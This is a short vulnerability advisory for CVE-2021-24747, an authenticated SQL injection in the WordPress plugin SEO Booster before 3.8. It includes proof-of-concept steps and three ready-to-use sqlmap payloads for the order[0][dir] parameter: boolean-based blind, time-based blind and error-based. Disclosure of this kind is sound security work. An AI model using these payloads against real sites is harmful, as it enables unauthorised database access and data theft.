SEO Booster < 3.8 – Admin+ SQL Injection | CVE 2021-24747

Description

The plugin allows for authenticated SQL injection via the "fn_my_ajaxified_dataloader_ajax" AJAX request as the $_REQUEST['order'][0]['dir'] parameter is not properly escaped leading to blind and error-based SQL injections.

Proof of Concept

Install SEO Booster, then click on the "Incoming Keywords" link in the Wordpress administrative interface. An ajax request called "fn_my_ajaxified_dataloader_ajax" will be generated and sent. Intercept it and modify order[0][dir] parameter to achieve different types of SQL injections.

Sqlmap vectors:

1. Type: boolean-based blind
order[0][dir]=desc,(SELECT (CASE WHEN (1081=1081) THEN 1 ELSE 1081*(SELECT 1081 FROM INFORMATION_SCHEMA.PLUGINS) END))

2. Type: time-based blind
order[0][dir]=desc PROCEDURE ANALYSE(EXTRACTVALUE(8553,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x4b686547))))),1)#

3. Type: error-based
order[0][dir]=desc,(SELECT 9426 FROM(SELECT COUNT(*),CONCAT(0x71766a6a71,(SELECT (ELT(9426=9426,1))),0x71767a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)